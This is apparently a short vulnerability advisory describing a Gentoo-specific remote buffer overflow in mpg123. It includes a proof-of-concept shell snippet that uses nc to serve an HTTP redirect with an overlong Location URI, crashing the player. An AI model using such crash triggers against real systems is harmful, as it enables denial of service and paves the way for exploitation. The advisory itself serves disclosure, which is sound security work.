Gentoo-Specific MPG123 Malicious URI Remote Buffer Overflow Vulnerability

Gentoo-Specific MPG123 Malicious URI Remote Buffer Overflow Vulnerability

The following commands are sufficient to demonstrate this issue by crashing affected applications:

( echo -ne "HTTP/1.1 302 Found\r\nLocation: "
echo -ne "http://fooooooooooooooooooooooooooooooooooooooooooooooooo/\r\n\r\n"
)| nc -lp 8080 &

mpg123 http://localhost:8080/

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.